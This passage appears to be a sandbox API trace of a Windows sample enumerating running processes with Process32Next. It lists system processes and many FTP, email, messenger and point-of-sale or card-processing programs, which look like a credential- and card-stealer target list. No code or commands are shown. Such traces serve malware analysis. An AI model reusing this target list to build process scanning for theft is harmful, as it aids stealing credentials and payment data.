hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.922] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.924] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.926] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.928] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.931] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0203.933] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0203.935] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0203.937] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0203.940] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.987] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0203.989] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0203.991] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0203.992] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0203.994] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0203.996] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0204.006] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.008] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0204.011] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0204.013] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0204.016] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.018] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0204.020] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0204.023] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0204.025] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0204.139] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0204.142] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0204.144] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0204.146] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0204.148] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0204.151] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0204.153] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0204.155] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0204.157] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0204.162] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0204.164] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0204.167] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0204.169] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0204.172] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0204.174] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0204.234] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0204.237] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0204.240] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0204.243] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0204.246] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0204.250] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0204.253] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0204.258] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0204.261] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0204.265] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0204.277] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0204.281] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0204.285] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0204.289] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0204.293] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0204.297] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0204.300] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0204.303] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0204.307] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0204.310] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0204.317] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0204.320] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0204.323] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0204.326] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0204.329] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0204.332] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0204.334] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0204.337] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0204.340] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0204.345] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0204.348] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0204.351] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0204.356] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0204.358] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0204.362] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0204.365] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0204.368] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0204.370] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0204.373] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0204.376] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0204.379] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0204.382] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0204.384] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0204.388] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0204.395] Process32Next (in: hSnapshot=0x20d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, 